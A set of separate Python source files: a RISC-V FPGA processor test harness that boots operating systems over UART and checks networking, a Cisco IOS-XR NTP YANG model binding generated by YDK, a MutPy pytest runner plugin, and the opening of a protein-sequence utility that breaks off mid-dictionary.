res, _val = basic_tester(gdb, uart, config.busybox_filename_bbl, \
config.busybox_timeouts['boot'], config.busybox_expected_contents['boot'], \
config.busybox_absent_contents['boot'])
if res == True:
print_and_log("Busybox basic test passed")
else:
raise RuntimeError("Busybox basic test failed")
if args.network:
print_and_log("Busybox network test")
# Send "Enter" to activate console
uart.send(b'\r')
time.sleep(1)
# Get the name of ethernet interface
cmd = b'ip a | grep "eth.:" -o \r'
print_and_log(cmd)
uart.send(cmd)
rx = uart.read(3)
print_and_log(rx)
if "eth1" in rx:
cmd1 = b'ip addr add 10.88.88.2/24 broadcast 10.88.88.255 dev eth1\r'
cmd2 = b'ip link set eth1 up\r'
else:
cmd1 = b'ip addr add 10.88.88.2/24 broadcast 10.88.88.255 dev eth0\r'
cmd2 = b'ip link set eth0 up\r'
print_and_log(cmd1)
uart.send(cmd1)
print_and_log(cmd2)
uart.send(cmd2)
cmd3 = b'ip a\r'
print_and_log(cmd3)
uart.send(cmd3)
if not uart.read_and_check(120, config.busybox_expected_contents['ping'])[0]:
raise RuntimeError("Busybox network test failed: cannot bring up eth interface")
print_and_log("Ping FPGA")
riscv_ip = "10.88.88.2"
ping_result = run(['ping','-c','10',riscv_ip], stdout=PIPE, stderr=PIPE)
print_and_log(str(ping_result.stdout,'utf-8'))
if ping_result.returncode != 0:
raise RuntimeError("Busybox network test failed: cannot ping the FPGA")
else:
print_and_log("Ping OK")
del gdb
del uart
# Debian tests
def test_debian(config, args):
print_and_log("Running debian tests")
# No clang
if config.compiler == "clang":
raise RuntimeError("Clang compiler is not supported for building Debian tests yet")
pwd = run(['pwd'], stdout=PIPE, stderr=PIPE)
pwd = str(pwd.stdout,'utf-8').rstrip()
if args.no_pcie:
debian_linux_config_path = pwd + '/' + config.debian_linux_config_path_no_pcie
else:
debian_linux_config_path = pwd + '/' + config.debian_linux_config_path
build_debian(config, debian_linux_config_path)
uart = UartSession()
print_and_log("Debian basic test")
gdb = GdbSession(openocd_config_filename=config.openocd_config_filename)
res, _val = basic_tester(gdb, uart, config.debian_filename_bbl, \
config.debian_timeouts['boot'], config.debian_expected_contents['boot'], \
config.debian_absent_contents['boot'])
if res == True:
print_and_log("Debian basic test passed")
else:
raise RuntimeError("Debian basic test failed")
if args.network:
print_and_log("Logging in to Debian")
# Send "Enter" to activate console
# uart.send(b'\r')
# time.sleep(1)
# Log in to Debian
uart.send(config.debian_username)
time.sleep(0.5)
uart.send(config.debian_password)
# Prompt takes some time to load before it can be used.
time.sleep(10)
print_and_log("Debian network test")
# Get the name of ethernet interface
cmd = b'ip a | grep "eth.:" -o \r'
print_and_log(cmd)
uart.send(cmd)
rx = uart.read(3)
print_and_log(rx)
if "eth1" in rx:
cmd1 = b'ip addr add 10.88.88.2/24 broadcast 10.88.88.255 dev eth1\r'
cmd2 = b'ip link set eth1 up\r'
else:
cmd1 = b'ip addr add 10.88.88.2/24 broadcast 10.88.88.255 dev eth0\r'
cmd2 = b'ip link set eth0 up\r'
print_and_log(cmd1)
uart.send(cmd1)
print_and_log(cmd2)
uart.send(cmd2)
cmd3 = b'ip a\r'
print_and_log(cmd3)
uart.send(cmd3)
if not uart.read_and_check(120, config.debian_expected_contents['ping'])[0]:
raise RuntimeError("Debian network test failed: cannot bring up eth interface")
print_and_log("Ping FPGA")
riscv_ip = "10.88.88.2"
ping_result = run(['ping','-c','10',riscv_ip], stdout=PIPE, stderr=PIPE)
print_and_log(str(ping_result.stdout,'utf-8'))
if ping_result.returncode != 0:
raise RuntimeError("Debian network test failed: cannot ping the FPGA")
else:
print_and_log("Ping OK")
del gdb
del uart
# Common FreeBSD test part
def build_freebsd(config):
run_and_log(print_and_log("Cleaning freebsd"),
run(['make','clean'],cwd=config.freebsd_folder,
env=dict(os.environ), stdout=PIPE, stderr=PIPE))
run_and_log(print_and_log("Building freebsd"),
run(['make'],cwd=config.freebsd_folder,
env=dict(os.environ), stdout=PIPE, stderr=PIPE))
# Common debian test parts
def build_debian(config, debian_linux_config_path):
user = run("whoami", stdout=PIPE)
if "root" in user.stdout.decode():
run_and_log(print_and_log("Cleaning bootmem program directory"),
run(['make','clean'],cwd=config.debian_folder,
env=dict(os.environ, LINUX_CONFIG=debian_linux_config_path), stdout=PIPE, stderr=PIPE))
else:
run_and_log(print_and_log("Cleaning bootmem program directory - this will prompt for sudo"),
run(['sudo','make','clean'],cwd=config.debian_folder,
env=dict(os.environ, LINUX_CONFIG=debian_linux_config_path), stdout=PIPE, stderr=PIPE))
run_and_log(print_and_log("Compiling debian, this might take a while"),
run(['make', 'debian'],cwd=config.debian_folder,
env=dict(os.environ, LINUX_CONFIG=debian_linux_config_path), stdout=PIPE, stderr=PIPE))
# Common busybox test parts
def build_busybox(config, linux_config_path):
run_and_log(print_and_log("Cleaning bootmem program directory"),
run(['make','clean'],cwd=config.busybox_folder,
env=dict(os.environ, LINUX_CONFIG=linux_config_path), stdout=PIPE, stderr=PIPE))
run_and_log(print_and_log("Compiling busybox, this might take a while"),
run(['make'],cwd=config.busybox_folder,
env=dict(os.environ, LINUX_CONFIG=linux_config_path), stdout=PIPE, stderr=PIPE))
# Initialize processor test, set logging etc
def test_init():
parser = argparse.ArgumentParser()
parser.add_argument("proc_name", help="processor to test [chisel_p1|chisel_p2|chisel_p3|bluespec_p1|bluespec_p2|bluespec_p3]")
parser.add_argument("--isa", help="run ISA tests",action="store_true")
parser.add_argument("--busybox", help="run Busybox OS",action="store_true")
parser.add_argument("--debian", help="run Debian OS",action="store_true")
parser.add_argument("--linux", help="run Debian OS",action="store_true")
parser.add_argument("--freertos", help="run FreeRTOS OS",action="store_true")
parser.add_argument("--freebsd", help="run FreeBSD OS",action="store_true")
parser.add_argument("--network", help="run network tests",action="store_true")
parser.add_argument("--io", help="run IO tests (P1 only)",action="store_true")
parser.add_argument("--flash", help="run flash tests",action="store_true")
parser.add_argument("--no-pcie", help="build without PCIe support (P2/P3 only)",action="store_true")
parser.add_argument("--no-bitstream",help="do not upload bitstream",action="store_true")
parser.add_argument("--compiler", help="select compiler to use [gcc|clang]",default="gcc")
parser.add_argument("--elf", help="path to an elf file to load and run. Make sure to specify --timeout parameter")
parser.add_argument("--netboot", help="Load file using netboot. Make sure to specify --timeout and --elf parameters",action="store_true")
parser.add_argument("--timeout", help="specify how log to run a binary specified in the --elf argument")
parser.add_argument("--expected", help="specify expected output of the binary specifed in the --elf argument, used for early exit." +
"Can be multiple arguments comma separated: \"c1,c2,c3...\"",default="None")
parser.add_argument("--absent", help="specify absent output of the binary specifed in the --elf argument. Absent content should not be present." +
"Can be multiple arguments comma separated: \"c1,c2,c3...\"",default="None")
parser.add_argument("--simulator", help="run in verilator",action="store_true")
parser.add_argument("--interactive","-i", help="run interactively",action="store_true")
parser.add_argument("--keep-log", help="Don't erase the log file at the beginning of session",action="store_true")
args = parser.parse_args()
# Make all paths in `args` absolute, so we can safely `chdir` later.
if args.elf is not None:
args.elf = os.path.abspath(args.elf)
gfeconfig.check_environment()
if not args.keep_log:
run(['rm','-rf','test_processor.log'])
logging.basicConfig(filename='test_processor.log',level=logging.DEBUG,format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
print_and_log("Test processor starting.")
return args
if __name__ == '__main__':
args = test_init()
# Make sure all `subprocess` calls, which use paths relative to this
# script, can find the right files.
os.chdir(os.path.dirname(__file__))
config = gfeconfig.Config(args)
if args.simulator:
test_simulator(config)
if args.no_bitstream or args.flash:
print_and_log("Skiping bitstream programming")
else:
test_program_bitstream(config)
# Load elf via GDB
if args.elf:
if not args.timeout:
raise RuntimeError("Please specify timeout for how long to run the binary")
if args.expected == "None":
expected = []
else:
expected = args.expected.split(',')
if args.absent == "None":
absent = []
else:
absent = args.absent.split(',')
if args.netboot:
load_netboot(config, args.elf, int(args.timeout), args.interactive, expected, absent)
else:
load_elf(config, args.elf, int(args.timeout), args.interactive, expected, absent)
if args.isa:
test_isa(config)
if args.freertos:
test_freertos(config, args)
if args.busybox:
test_busybox(config, args)
if args.debian:
test_debian(config, args)
if args.freebsd:
test_freebsd(config, args)
print_and_log('Finished!')
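# Example invocations, assuming this script is saved as test_processor.py
# (the elf path and expected string below are illustrative):
#   ./test_processor.py chisel_p1 --isa
#   ./test_processor.py bluespec_p2 --freertos --network
#   ./test_processor.py chisel_p2 --elf ./prog.elf --timeout 60 --expected "PASS"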
|
""" ntp
This module contains definitions
for the Calvados model objects.
This module contains a collection of YANG definitions
for Cisco IOS\-XR sysadmin NTP configuration.
This module contains definitions
for the following management objects\:
NTP configuration data
Copyright (c) 2013\-2016 by Cisco Systems, Inc.
All rights reserved.
Copyright (c) 2012\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
import sys
from collections import OrderedDict
from ydk.types import Entity as _Entity_
from ydk.types import EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class Ntp(_Entity_):
"""
.. attribute:: peer
**type**\: list of :py:class:`Peer <ydk.models.cisco_ios_xr.ntp.Ntp.Peer>`
.. attribute:: server
**type**\: list of :py:class:`Server <ydk.models.cisco_ios_xr.ntp.Ntp.Server>`
.. attribute:: trusted_key
**type**\: list of int
**range:** 1..65534
.. attribute:: authenticate
**type**\: :py:class:`Empty<ydk.types.Empty>`
.. attribute:: authentication_key
**type**\: list of :py:class:`AuthenticationKey <ydk.models.cisco_ios_xr.ntp.Ntp.AuthenticationKey>`
.. attribute:: trace
**type**\: :py:class:`Trace <ydk.models.cisco_ios_xr.ntp.Ntp.Trace>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp, self).__init__()
self._top_entity = None
self.yang_name = "ntp"
self.yang_parent_name = "ntp"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("peer", ("peer", Ntp.Peer)), ("server", ("server", Ntp.Server)), ("authentication-key", ("authentication_key", Ntp.AuthenticationKey)), ("trace", ("trace", Ntp.Trace))])
self._leafs = OrderedDict([
('trusted_key', (YLeafList(YType.int32, 'trusted-key'), ['int'])),
('authenticate', (YLeaf(YType.empty, 'authenticate'), ['Empty'])),
])
self.trusted_key = []
self.authenticate = None
self.trace = Ntp.Trace()
self.trace.parent = self
self._children_name_map["trace"] = "trace"
self.peer = YList(self)
self.server = YList(self)
self.authentication_key = YList(self)
self._segment_path = lambda: "ntp:ntp"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp, ['trusted_key', 'authenticate'], name, value)
class Peer(_Entity_):
"""
.. attribute:: name (key)
**type**\: str
.. attribute:: version
**type**\: int
**range:** 1..4
.. attribute:: key_id
**type**\: int
**range:** 1..65534
.. attribute:: prefer
**type**\: :py:class:`Empty<ydk.types.Empty>`
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Peer, self).__init__()
self.yang_name = "peer"
self.yang_parent_name = "ntp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
('version', (YLeaf(YType.int32, 'version'), ['int'])),
('key_id', (YLeaf(YType.int32, 'key-id'), ['int'])),
('prefer', (YLeaf(YType.empty, 'prefer'), ['Empty'])),
])
self.name = None
self.version = None
self.key_id = None
self.prefer = None
self._segment_path = lambda: "peer" + "[name='" + str(self.name) + "']"
self._absolute_path = lambda: "ntp:ntp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Peer, ['name', 'version', 'key_id', 'prefer'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Peer']['meta_info']
class Server(_Entity_):
"""
.. attribute:: name (key)
**type**\: str
.. attribute:: version
**type**\: int
**range:** 1..4
.. attribute:: key_id
**type**\: int
**range:** 1..65534
.. attribute:: prefer
**type**\: :py:class:`Empty<ydk.types.Empty>`
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Server, self).__init__()
self.yang_name = "server"
self.yang_parent_name = "ntp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
('version', (YLeaf(YType.int32, 'version'), ['int'])),
('key_id', (YLeaf(YType.int32, 'key-id'), ['int'])),
('prefer', (YLeaf(YType.empty, 'prefer'), ['Empty'])),
])
self.name = None
self.version = None
self.key_id = None
self.prefer = None
self._segment_path = lambda: "server" + "[name='" + str(self.name) + "']"
self._absolute_path = lambda: "ntp:ntp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Server, ['name', 'version', 'key_id', 'prefer'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Server']['meta_info']
class AuthenticationKey(_Entity_):
"""
.. attribute:: key_number (key)
**type**\: int
**range:** 1..65534
.. attribute:: md5_keyword
**type**\: :py:class:`Md5Keyword <ydk.models.cisco_ios_xr.ntp.Ntp.AuthenticationKey.Md5Keyword>`
**mandatory**\: True
.. attribute:: encryption
**type**\: :py:class:`Encryption <ydk.models.cisco_ios_xr.ntp.Ntp.AuthenticationKey.Encryption>`
.. attribute:: keyname
**type**\: str
**length:** 0..32
**mandatory**\: True
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.AuthenticationKey, self).__init__()
self.yang_name = "authentication-key"
self.yang_parent_name = "ntp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['key_number']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('key_number', (YLeaf(YType.int32, 'key-number'), ['int'])),
('md5_keyword', (YLeaf(YType.enumeration, 'md5-keyword'), [('ydk.models.cisco_ios_xr.ntp', 'Ntp', 'AuthenticationKey.Md5Keyword')])),
('encryption', (YLeaf(YType.enumeration, 'encryption'), [('ydk.models.cisco_ios_xr.ntp', 'Ntp', 'AuthenticationKey.Encryption')])),
('keyname', (YLeaf(YType.str, 'keyname'), ['str'])),
])
self.key_number = None
self.md5_keyword = None
self.encryption = None
self.keyname = None
self._segment_path = lambda: "authentication-key" + "[key-number='" + str(self.key_number) + "']"
self._absolute_path = lambda: "ntp:ntp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.AuthenticationKey, ['key_number', 'md5_keyword', 'encryption', 'keyname'], name, value)
class Encryption(Enum):
"""
Encryption (Enum Class)
.. data:: clear = 0
.. data:: encrypted = 1
"""
clear = Enum.YLeaf(0, "clear")
encrypted = Enum.YLeaf(1, "encrypted")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.AuthenticationKey.Encryption']
class Md5Keyword(Enum):
"""
Md5Keyword (Enum Class)
.. data:: md5 = 0
"""
md5 = Enum.YLeaf(0, "md5")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.AuthenticationKey.Md5Keyword']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.AuthenticationKey']['meta_info']
class Trace(_Entity_):
"""
.. attribute:: ntp_helper
**type**\: :py:class:`NtpHelper <ydk.models.cisco_ios_xr.ntp.Ntp.Trace.NtpHelper>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Trace, self).__init__()
self.yang_name = "trace"
self.yang_parent_name = "ntp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("ntp_helper", ("ntp_helper", Ntp.Trace.NtpHelper))])
self._leafs = OrderedDict()
self.ntp_helper = Ntp.Trace.NtpHelper()
self.ntp_helper.parent = self
self._children_name_map["ntp_helper"] = "ntp_helper"
self._segment_path = lambda: "trace"
self._absolute_path = lambda: "ntp:ntp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Trace, [], name, value)
class NtpHelper(_Entity_):
"""
.. attribute:: trace
show traceable processes
**type**\: list of :py:class:`Trace_ <ydk.models.cisco_ios_xr.ntp.Ntp.Trace.NtpHelper.Trace_>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Trace.NtpHelper, self).__init__()
self.yang_name = "ntp_helper"
self.yang_parent_name = "trace"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("trace", ("trace", Ntp.Trace.NtpHelper.Trace_))])
self._leafs = OrderedDict()
self.trace = YList(self)
self._segment_path = lambda: "ntp_helper"
self._absolute_path = lambda: "ntp:ntp/trace/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Trace.NtpHelper, [], name, value)
class Trace_(_Entity_):
"""
show traceable processes
.. attribute:: buffer (key)
**type**\: str
**config**\: False
.. attribute:: location
**type**\: list of :py:class:`Location <ydk.models.cisco_ios_xr.ntp.Ntp.Trace.NtpHelper.Trace_.Location>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Trace.NtpHelper.Trace_, self).__init__()
self.yang_name = "trace"
self.yang_parent_name = "ntp_helper"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['buffer']
self._child_classes = OrderedDict([("location", ("location", Ntp.Trace.NtpHelper.Trace_.Location))])
self._leafs = OrderedDict([
('buffer', (YLeaf(YType.str, 'buffer'), ['str'])),
])
self.buffer = None
self.location = YList(self)
self._segment_path = lambda: "trace" + "[buffer='" + str(self.buffer) + "']"
self._absolute_path = lambda: "ntp:ntp/trace/ntp_helper/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Trace.NtpHelper.Trace_, ['buffer'], name, value)
class Location(_Entity_):
"""
.. attribute:: location_name (key)
**type**\: str
**config**\: False
.. attribute:: all_options
**type**\: list of :py:class:`AllOptions <ydk.models.cisco_ios_xr.ntp.Ntp.Trace.NtpHelper.Trace_.Location.AllOptions>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Trace.NtpHelper.Trace_.Location, self).__init__()
self.yang_name = "location"
self.yang_parent_name = "trace"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['location_name']
self._child_classes = OrderedDict([("all-options", ("all_options", Ntp.Trace.NtpHelper.Trace_.Location.AllOptions))])
self._leafs = OrderedDict([
('location_name', (YLeaf(YType.str, 'location_name'), ['str'])),
])
self.location_name = None
self.all_options = YList(self)
self._segment_path = lambda: "location" + "[location_name='" + str(self.location_name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Trace.NtpHelper.Trace_.Location, ['location_name'], name, value)
class AllOptions(_Entity_):
"""
.. attribute:: option (key)
**type**\: str
**config**\: False
.. attribute:: trace_blocks
**type**\: list of :py:class:`TraceBlocks <ydk.models.cisco_ios_xr.ntp.Ntp.Trace.NtpHelper.Trace_.Location.AllOptions.TraceBlocks>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Trace.NtpHelper.Trace_.Location.AllOptions, self).__init__()
self.yang_name = "all-options"
self.yang_parent_name = "location"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['option']
self._child_classes = OrderedDict([("trace-blocks", ("trace_blocks", Ntp.Trace.NtpHelper.Trace_.Location.AllOptions.TraceBlocks))])
self._leafs = OrderedDict([
('option', (YLeaf(YType.str, 'option'), ['str'])),
])
self.option = None
self.trace_blocks = YList(self)
self._segment_path = lambda: "all-options" + "[option='" + str(self.option) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Trace.NtpHelper.Trace_.Location.AllOptions, ['option'], name, value)
class TraceBlocks(_Entity_):
"""
.. attribute:: data
Trace output block
**type**\: str
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Trace.NtpHelper.Trace_.Location.AllOptions.TraceBlocks, self).__init__()
self.yang_name = "trace-blocks"
self.yang_parent_name = "all-options"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('data', (YLeaf(YType.str, 'data'), ['str'])),
])
self.data = None
self._segment_path = lambda: "trace-blocks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Trace.NtpHelper.Trace_.Location.AllOptions.TraceBlocks, ['data'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Trace.NtpHelper.Trace_.Location.AllOptions.TraceBlocks']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Trace.NtpHelper.Trace_.Location.AllOptions']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Trace.NtpHelper.Trace_.Location']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Trace.NtpHelper.Trace_']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Trace.NtpHelper']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Trace']['meta_info']
def clone_ptr(self):
self._top_entity = Ntp()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp']['meta_info']
class ClockAction(_Entity_):
"""
.. attribute:: clock
**type**\: :py:class:`Clock <ydk.models.cisco_ios_xr.ntp.ClockAction.Clock>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ClockAction, self).__init__()
self._top_entity = None
self.yang_name = "clock-action"
self.yang_parent_name = "ntp"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("clock", ("clock", ClockAction.Clock))])
self._leafs = OrderedDict()
self.clock = ClockAction.Clock()
self.clock.parent = self
self._children_name_map["clock"] = "clock"
self._segment_path = lambda: "ntp:clock-action"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ClockAction, [], name, value)
class Clock(_Entity_):
"""
.. attribute:: action
**type**\: :py:class:`Action <ydk.models.cisco_ios_xr.ntp.ClockAction.Clock.Action>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ClockAction.Clock, self).__init__()
self.yang_name = "clock"
self.yang_parent_name = "clock-action"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("Action", ("action", ClockAction.Clock.Action))])
self._leafs = OrderedDict()
self.action = ClockAction.Clock.Action()
self.action.parent = self
self._children_name_map["action"] = "Action"
self._segment_path = lambda: "clock"
self._absolute_path = lambda: "ntp:clock-action/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ClockAction.Clock, [], name, value)
class Action(_Entity_):
"""
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ClockAction.Clock.Action, self).__init__()
self.yang_name = "Action"
self.yang_parent_name = "clock"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict()
self._segment_path = lambda: "Action"
self._absolute_path = lambda: "ntp:clock-action/clock/%s" % self._segment_path()
self._is_frozen = True
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['ClockAction.Clock.Action']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['ClockAction.Clock']['meta_info']
def clone_ptr(self):
self._top_entity = ClockAction()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['ClockAction']['meta_info']
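# Hedged usage sketch (assumes the ydk-py CRUDService / NetconfServiceProvider
# API and a reachable device; the address and credentials below are placeholders):
# read the operational NTP data modelled by the Ntp container defined above.
def _example_read_ntp_oper():
    from ydk.services import CRUDService
    from ydk.providers import NetconfServiceProvider
    provider = NetconfServiceProvider(address="10.0.0.1", username="admin", password="admin")
    return CRUDService().read(provider, Ntp())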
|
import pytest
from _pytest.config import default_plugins
from mutpy.test_runners.base import BaseTestSuite, BaseTestRunner, MutationTestResult, CoverageTestResult, BaseTest
class PytestMutpyPlugin:
def __init__(self, skipped_tests):
self.skipped_tests = skipped_tests
self.mutation_test_result = MutationTestResult()
def has_failed_before(self, nodeid):
return next((test for test in self.mutation_test_result.failed if test.name == nodeid), None) is not None
def has_been_skipped_before(self, nodeid):
return next((test for test in self.mutation_test_result.skipped if test.name == nodeid), None) is not None
def pytest_collection_modifyitems(self, items):
for item in items:
if item.nodeid in self.skipped_tests:
item.add_marker(pytest.mark.skip)
def pytest_runtest_logreport(self, report):
if report.skipped:
self.mutation_test_result.add_skipped(report.nodeid)
elif report.failed and not self.has_failed_before(report.nodeid):
if 'TypeError' in report.longrepr.reprcrash.message:
self.mutation_test_result.set_type_error(TypeError(str(report.longrepr.reprcrash)))
else:
if not hasattr(report, 'longreprtext'):
with open("Output.txt", "w") as text_file:
                        text_file.write(report.nodeid + ' ' + str(vars(report)))
self.mutation_test_result.add_failed(report.nodeid, report.longrepr.reprcrash.message.splitlines()[0],
report.longreprtext)
elif report.passed and report.when == 'teardown' and not self.has_failed_before(report.nodeid) \
and not self.has_been_skipped_before(report.nodeid):
self.mutation_test_result.add_passed(report.nodeid)
class PytestMutpyCoveragePlugin:
def __init__(self, coverage_injector):
self.current_test = None
self.coverage_result = CoverageTestResult(coverage_injector=coverage_injector)
def pytest_runtest_setup(self, item):
self.coverage_result.start_measure_coverage()
self.current_test = item
def pytest_runtest_teardown(self, nextitem):
self.coverage_result.stop_measure_coverage(PytestTest(self.current_test))
self.current_test = None
class PytestMutpyTestDiscoveryPlugin:
def __init__(self):
self.tests = []
def pytest_collection_modifyitems(self, items):
for item in items:
self.tests.append(item)
class PytestTestSuite(BaseTestSuite):
def __init__(self):
self.tests = set()
self.skipped_tests = set()
def add_tests(self, test_module, target_test):
if target_test:
self.tests.add('{0}::{1}'.format(test_module.__file__, target_test))
elif hasattr(test_module, '__file__'):
self.tests.add(test_module.__file__)
else:
self.tests.add(test_module.__name__)
def skip_test(self, test):
self.skipped_tests.add(test.internal_test_obj.nodeid)
def run(self):
mutpy_plugin = PytestMutpyPlugin(skipped_tests=self.skipped_tests)
pytest.main(args=list(self.tests) + ['-x', '-p', 'no:terminal'], plugins=list(default_plugins) + [mutpy_plugin])
return mutpy_plugin.mutation_test_result
def run_with_coverage(self, coverage_injector=None):
mutpy_plugin = PytestMutpyCoveragePlugin(coverage_injector=coverage_injector)
pytest.main(list(self.tests) + ['-p', 'no:terminal'], plugins=list(default_plugins) + [mutpy_plugin])
return mutpy_plugin.coverage_result
def __iter__(self):
mutpy_plugin = PytestMutpyTestDiscoveryPlugin()
pytest.main(args=list(self.tests) + ['--collect-only', '-p', 'no:terminal'],
plugins=list(default_plugins) + [mutpy_plugin])
for test in mutpy_plugin.tests:
yield PytestTest(test)
class PytestTest(BaseTest):
def __repr__(self):
return self.internal_test_obj.nodeid
def __init__(self, internal_test_obj):
self.internal_test_obj = internal_test_obj
class PytestTestRunner(BaseTestRunner):
test_suite_cls = PytestTestSuite
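# Minimal usage sketch (hypothetical, not part of MutPy itself): build a suite
# from an already imported test module and run it through the pytest plugin,
# collecting the resulting MutationTestResult.
def _example_run_suite(test_module):
    suite = PytestTestSuite()
    suite.add_tests(test_module, target_test=None)  # register every test in the module
    return suite.run()  # MutationTestResult filled in by PytestMutpyPlugin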
|
# Copyright (c) 2022, Sabine Reisser
# All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import pdb2pqr
import re
import numpy as np
from config import *
import subprocess
import logging
logger = logging.getLogger(__name__)
def generate_3letter_code(seq, pH=7., nterm='N', cterm='C'):
aa_map = {
"A": "ALA",
"C": "CYS",
"D": "ASP",
"E": "GLU",
"F": "PHE",
"G": "GLY",
"H": "HIS",
"I": "ILE",
"K": "LYS",
"L": "LEU",
"M": "MET",
"N": "ASN",
"P": "PRO",
"Q": "GLN",
"R": "ARG",
"S": "SER",
